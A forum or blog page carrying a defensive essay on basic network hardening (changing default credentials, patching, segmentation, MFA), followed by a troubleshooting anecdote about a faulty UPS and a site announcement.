    In reality, it’s quite the opposite. Organisations often purchase bleeding edge infrastructure as a means of leveraging the clear technical advantages, enhanced security, and competitive edge it provides. However, under the impressive start of the art ambience and air conditioning often lies an unwanted beast. This mostly invisible beast lives on low-hanging fruit, will be tempted to help itself at any given opportunity, and is always hungry. For those becoming slightly bewildered at this point, there really isn’t an invisible beast lurking around your network that eats fruit. But, with a poorly secured infrastructure, there might as well be. The beast being referenced here is an uninvited intruder in your network. A bad actor, threat actor, bad guy, criminal…. call it what you want (just don’t use the word hacker) can find their way inside your network by leveraging the one thing that I’ve seen time and time again in literally every organisation I ever worked for throughout my career - the default username and password. I really can’t stress the importance of changing this on new (and existing) network equipment enough, and it doesn’t stop at this either.

    Changing the default username and password is about 10% of the puzzle when it comes to security and basic protection principles. Even the most complex credentials can be bypassed completely by a vulnerability (or in some cases, a backdoor) in ageing firmware on switches, firewalls, routers, storage arrays, and a wealth of others - including printers (which incidentally make an ideal watering hole thanks to the defaults of FTP, HTTP, SNMP, and Telnet, most (if not all of) are usually always on. As cheaper printers do not have screens like their more expensive copier counterparts (the estate is reduced to make the device smaller and cheaper), any potential criminal can hide here and not be detected - often for months at a time - arguably, they could live in a copier without you being aware also. A classic example of an unknown exploit into a system was the Juniper firewall backdoor that permitted full admin access using a specific password - regardless of the one set by the owner. Whilst the Juniper exploit didn’t exactly involve a default username and password as such (although this particular exploit was hard-coded into the firmware, meaning that any “user” with the right coded password and SSH access remotely would achieve full control over the device), it did leverage the specific vulnerability in the fact that poorly configured devices could have SSH configured as accessible to 0.0.0.0/0 (essentially, the entire planet) rather than a trusted set of IP addresses - typically from an approved management network.

    We all need to get out of the mindset of taking something out of a box, plugging it into our network, and then doing nothing else - such as changing the default username and password (ideally disabling it completely and replacing it with a unique ID) or turning off access protocols that we do not want or need. The real issue here is that today’s technology standards make it simple for literally anyone to purchase something and set it up within a few minutes without considering that a simple port scan of a subnet can reveal a wealth of information to an attacker - several of these tools are equipped with a default username and password dictionary that is leveraged against the device in question if it responds to a request. Changing the default configuration instead of leaving it to chance can dramatically reduce the attack landscape in your network. Failure to do so changes “plug and play” to “ripe for picking”, and its those devices that perform seemingly “minor” functions in your network that are the easiest to exploit - and leverage in order to gain access to neighbouring ancillary services. Whilst not an immediate gateway into another device, the compromised system can easily give an attacker a good overview of what else is on the same subnet, for example.

    So how did we arrive at the low hanging fruit paradigm ?

    It’s simple enough if you consider the way that fruit can weigh down the branch to the point where it is low enough to be picked easily. A poorly secured network contains many vulnerabilities that can be leveraged and exploited very easily without the need for much effort on the part of an attacker. It’s almost like a horse grazing in a field next to an orchard where the apples hang over the fence. It’s easily picked, often overlooked, and gone in seconds. When this term is used in information security, a common parallel is the path of least resistance. For example, a pickpocket can acquire your wallet without you even being aware, and this requires a high degree of skill in order to evade detection yet still achieve the primary objective. On the other hand, someone strolling down the street with an expensive camera hanging over their shoulder is a classic example of the low hanging fruit synopsis in the sense that this theft is based on an opportunity that wouldn’t require much effort - yet with a high yield. Here’s an example of how that very scenario could well play out.

    Now, as much as we’d all like to handle cyber crime in this way, we can’t. It’s illegal 🙂

    What isn’t illegal is prevention. 80% of security is based on best practice. Admittedly, there is a fair argument as to what exactly is classed as “best” these days, although it’s a relatively well known fact that patching the Windows operating system for example is one of the best ways to stamp out a vulnerability - but only for that system that it is designed to protect against. Windows is just the tip of the iceberg when it comes to vulnerabilities - it’s not just operating systems that suffer, but applications, too. You could take a Windows based IIS server, harden it in terms of permitted protocols and services, plus install all of the available patches - yet have an outdated version of WordPress running (see here for some tips on how to reduce that threat), or often even worse, outdated plugins that allow remote code execution. The low hanging fruit problem becomes even more obvious when you consider breaches such as the well-publicised Mossack Fonseca (“Panama Papers”). What became clear after an investigation is that the attackers in this case leveraged vulnerabilities in the firm’s WordPress and Joomla public facing installations - this in fact led to them being able to exploit an equally vulnerable mail server by brute-forcing it.

    So what should you do ? The answer is simple. It’s harvest time.

    If there is no low-hanging fruit to pick, life becomes that much more difficult for any attacker looking for a quick “win”. Unless determined, it’s unlikely that your average attacker is going to spend a significant amount of time on a target (unless it’s Fort Knox - then you’ve have to question the sophistication) then walk away empty handed with nothing to show for the effort. To this end, below are my top recommendations. They are not new, non-exhaustive, and certainly not rocket science - yet they are surprisingly missing from the “security 101” perspective in several organisations.

    Change the default username and password on ALL infrastructure. It doesn’t matter if it’s not publicly accessible - this is irrelevant when you consider the level of threats that have their origins from the inside. If you do have to keep the default username (in other words, it can’t be disabled), set the lowest possible access permissions, and configure a strong password. Close all windows - in this case, lock down protocols and ports that are not essential - and if you really do need them open, ensure that they are restricted Deploy MFA (or at least 2FA) to all public facing systems and those that contain sensitive or personally identifiable information Deploy adequate monitoring and logging techniques, using a sane level of retention. Without any way of forensic examination, any bad actor can be in and out of your network well before you even realise a breach may have taken place. The only real difference is that without decent logging, you have no way of confirming or even worse, quantifying your suspicion. This can spell disaster in regulated industries. Don’t shoot yourself in the foot. Ensure all Windows servers and PC’s are up to date with the latest patches. The same applies to Linux and MAC systems - despite the hype, they are vulnerable to an extent (but not in the same way as Windows), although attacks are notoriously more difficult to deploy and would need to be in the form of a rootkit to work properly Do not let routers, firewalls, switches, etc “slip” in terms of firmware updates. Keep yourself and your team regularly informed and updated around the latest vulnerabilities, assess their impact, and most importantly, plan an update review. Not upgrading firmware on critical infrastructure can have a dramatic effect on your overall security. Lock down USB ports, CD/DVD drives, and do not permit access to file sharing, social media, or web based email. This has been an industry standard for years, but you’d be surprised at just how many organisations still have these open and yet, do not consider this a risk. Reduce the attack vector by segmenting your network using VLANS. For example, the sales VLAN does not need to (and shouldn’t need to) connect directly to accounting etc. In this case, a ransomware or malware outbreak in sales would not traverse to other VLANS, therefore, restricting the spread. A flat network is simple to manage, but a level playing field for an attacker to compromise if all the assets are in the same space. Don’t use an account with admin rights to perform your daily duties. There’s no prizes for guessing the level of potential damage this can cause if your account is compromised, or you land up with malware on your PC Educate and phish your users on a continual basis. They are the gateway directly into your network, and bypassing them is surprisingly easy. You only have to look at the success of phishing campaigns to realise that they are (and always will be) the weakest link in your network. Devise a consistent security and risk review framework. Conducting periodic security reviews is always a good move, and you’d be surprised at just what is lurking around on your network without your knowledge. There needn’t be a huge budget for this. There are a number of open source projects and platforms that make this process simple in terms of identification, but you’ll still need to complete the “grunt” work in terms of remediation. I am currently authoring a framework that will be open source, and will share this with the community once it is completed. Conduct regular governance and due diligence on vendors - particularly those that handle information considered sensitive (think GDPR). If their network is breached, any information they hold around your network and associated users is also at risk. Identify weak or potential risk areas within your network. Engage with business leaders and management to raise awareness around best practice, and information security. Perform breach simulation, and engage senior management in this exercise. As they are the fundamental core of the business function, they also need to understand the risk, and more importantly, the decisions and communication that is inevitable post breach.

    There is no silver bullet when it comes to protecting your network, information, and reputation. However, the list above will form the basis of a solid framework.

    Let’s not be complacent - let’s be compliant.

  • 0 Votes
    3 Posts
    286 Views

    @justoverclock yes, completely understand that. It’s a haven for criminal gangs and literally everything is on the table. Drugs, weapons, money laundering, cyber attacks for rent, and even murder for hire.

    Nothing it seems is off limits. The dark web is truly a place where the only limitation is the amount you are prepared to spend.

  • 0 Votes
    1 Posts
    347 Views

    tech.jpeg
    Ever heard of KISS ? Nope - not these guys

    kiss.jpeg
    What I’m referring to is the acronym was reportedly coined by Kelly Johnson, lead engineer at the Lockheed Skunk Works (creators of the Lockheed U-2 and SR-71 Blackbird spy planes, among many others), which formed the basis of the relationship between the way things break, and the sophistication available to repair them. You might be puzzled at why I’d write about something like this, but it’s a situation I see constantly – one I like to refer to as “over thinker syndrome”. What do I mean by this ? Here’s the theory. Some people are very analytical when it comes to problem solving. Couple that with technical knowledge and you could land up with a situation where something relatively simple gets blown out of all proportion because the scenario played out in the mind is often much further from reality than you’d expect. And the technical reasoning is usually always to blame.

    Some years ago in a previous career, a colleague noticed that the Exchange Server (2003 wouldn’t you know) would suddenly reboot half way through a backup job. Rightly so, he wanted to investigate and asked me if this would be ok. Anyone with an ounce of experience knows that functional backups are critical in the event of a disaster – none more so than I – obviously, I gave the go ahead. One bright spark in my team suggested a reboot of the server, which immediately prompted the response

    “……it’s rebooting itself every day, so how will that help ?”

    There’s always one, isn’t there ? The final (and honestly more realistic suggestion) was to enable verbose logging in Exchange. This is actually a good idea, but only if you suspect that the information store could be the issue. Given the evidence, I wasn’t convinced. If there was corruption in the store, or on any of the disks, this would show itself randomly through the day and wouldn’t wait until 2am in the morning. Not wanting to come across as condescending, I agreed, but at the same time, set a deadline to escalation. I wasn’t overly concerned about the backups as these were being completed manually each day whilst the investigations were taking place. Neither was I concerned at what could be seen at this point as wasting someone’s time when you think you may have the answer to what now seemed to be an impossible problem. This is where experience will eclipse any formal qualifications hands down. Those with university degrees may scoff at this, but those with substantially analytical thinking patterns seem to avoid logic like the plague and go off on a wild tangent looking for a dramatically technical explanation and solution to a problem when it’s much simpler than you’d expect.

    After witnessing the pained expression on the face of my now exasperated and exhausted tech, I said “let’s get a coffee”. In agreement, he followed me to the kitchen and then asked me what I thought the problem could be. I said that if he wanted my advice, it would be to step back and look at this problem from a logical angle rather than technical. The confused look I received was priceless – the guy must have really though I’d lost the plot. After what seemed like an eternity (although in reality only a few seconds) he asked me what I meant by this. “Come with me”, I said. Finishing his coffee, he diligently followed me to the server room. Once inside, I asked him to show me the Exchange Server. Puzzled, he correctly pointed out the exact machine. I then asked him to trace the power cables and tell me where they went.

    As with most server rooms, locating and identifying cables can be a bit of a challenge after equipment has been added and removed, so this took a little longer than we expected. Eventually, the tech traced the cables back to

    ………an old looking UPS that had a red light illuminated at the front like it had been a prop in a Terminator film.

    Suddenly, the real cause of this issue dawned on the tech like a morning sunrise over the Serengeti. The UPS that the Exchange Server was unexpectedly connected to had a faulty battery. The UPS was conducting a self test at 2am each morning, and because the bypass test failed owing to the burnt battery, the connected server lost power and started back up after the offending equipment left bypass mode and went online.

    Where is this going you might ask ? Here’s the moral of this particular story

    Just because a problem involves technology, it doesn’t mean that the answer has to be a complex technical one Logic and common sense has a part to play in all of our lives. Sometimes, it makes more sense just to step back, take a breath, and see something for what it really is before deciding to commit It’s easy to allow technical expertise to cloud your judgement – don’t fall into the trap of using a sledgehammer to break an egg You cannot buy experience – it’s earned, gained, and leaves an indelible mark
  • 0 Votes
    1 Posts
    222 Views

    I’m excited to announce that a new blog section has been added 😛 The blog is actually using Ghost and not NodeBB, and also sits on it’s own subdomain of https://content.sudonix.com (if you ever fancy hitting it directly).

    We’ve moved all the blog articles out of the existing category here, and migrated them to the Ghost platform. However, you can still comment on these articles just like they were part of the root system. If you pick a blog article whilst logged in

    7e61c35b-2304-4c06-bda2-34da52252e1a-image.png

    Then choose the blog article you want to read

    7ca5089e-cf7e-4050-b951-5426fd1c6ec3-image.png

    Once opened, you’ll see a short synopsis of the article

    1bc086b4-5968-4e81-bc47-70de263b2275-image.png

    Click the link to read the rest of the post. Scroll down to the bottom, and you’ll see a space where you can provide your comments ! Take the time to read the articles, and provide your own feedback - I’d love to hear it.

    3f712e7c-475d-42d4-a5ca-b4becff6cc2e-image.png

    The blog component is not quite finished yet - it needs some polish, and there’s a few bugs scattered here and there, but these will only manifest themselves if a certain sequence of events is met.